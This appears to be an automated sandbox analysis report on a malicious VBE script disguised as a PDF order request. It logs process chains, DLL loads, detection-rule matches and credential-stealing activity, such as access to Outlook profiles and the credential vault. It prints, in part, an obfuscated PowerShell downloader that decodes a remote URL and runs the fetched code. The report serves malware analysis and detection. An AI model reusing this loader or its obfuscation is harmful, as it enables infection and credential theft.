                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. 
DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfru
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848CEB276 2_2_00007FF848CEB276
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848CEC022 2_2_00007FF848CEC022
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848DB994A 2_2_00007FF848DB994A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_049DF320 4_2_049DF320
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_049DFBF0 4_2_049DFBF0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_049DEFD8 4_2_049DEFD8
                Source: C:\Windows\SysWOW64\dxdiag.exe Code function: 18_3_05F6ED99 18_3_05F6ED99
                Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7271
                Source: unknown Process created: Commandline size = 7271
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7271Jump to behavior
                Source: amsi32_6412.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 3032, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 6412, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBE@30/10@2/3
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Drgs.TrsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5692:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rpbhzuw5.bia.ps1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3032
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6412
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: dxdiag.exe, 00000012.00000003.2460155696.0000000021905000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbeReversingLabs: Detection: 15%
                Source: PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbeVirustotal: Detection: 12%
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. 
DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfru
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" (same obfuscated command line as the System32 powershell.exe process created by wscript.exe above)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"
                Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: schannel.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\dxdiag.exe Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                Source: Binary string: m.Core.pdb source: powershell.exe, 00000004.00000002.3010425134.0000000000D65000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: dxdiag.pdbGCTL source: 31437F.exe.18.dr
                Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000004.00000002.3010425134.0000000000D65000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: dxdiag.pdb source: 31437F.exe.18.dr
